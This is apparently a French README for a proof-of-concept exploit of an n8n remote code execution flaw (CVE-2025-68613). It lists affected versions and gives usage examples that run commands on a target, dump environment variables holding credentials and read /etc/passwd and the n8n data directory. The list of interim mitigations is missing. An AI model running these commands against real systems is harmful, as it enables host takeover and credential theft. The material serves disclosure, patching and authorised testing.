
CVE-2025-68613 — n8n RCE par injection d'expression
À des fins éducatives et de recherche en sécurité autorisée uniquement.
Vulnérabilité RCE critique (CVSS 9.9) dans la plateforme d'automatisation de workflows n8n. Les utilisateurs authentifiés peuvent exécuter des commandes OS arbitraires via le nœud executeCommand, contournant les restrictions du bac à sable.
| Champ | Détail |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Critique) |
| Versions concernées | >= 0.211.0 < 1.120.4 |
| Authentification requise | Oui (tout utilisateur disposant des permissions de création de workflows) |
| Testé sur | n8n 1.119.1 |
| Corrigé dans | 1.120.4, 1.121.1, 1.122.0 |
n8n évalue les paramètres des nœuds de workflow côté serveur. Le nœud executeCommand exécute des commandes shell directement sur l'hôte avec les privilèges du processus n8n. Tout utilisateur authentifié disposant des permissions de création ou d'édition de workflows peut en abuser pour obtenir un RCE complet.
bash poc_final.sh <target> <email> <password> <command>
Exemples :
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
Remarque : Si votre mot de passe contient des caractères spéciaux comme
!, utilisez des guillemets simples.
Mettez à jour vers n8n >= 1.120.4 immédiatement.
Si la mise à jour n'est pas immédiatement possible :
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite pour tester est illégale. L'auteur n'est pas responsable de toute utilisation abusive.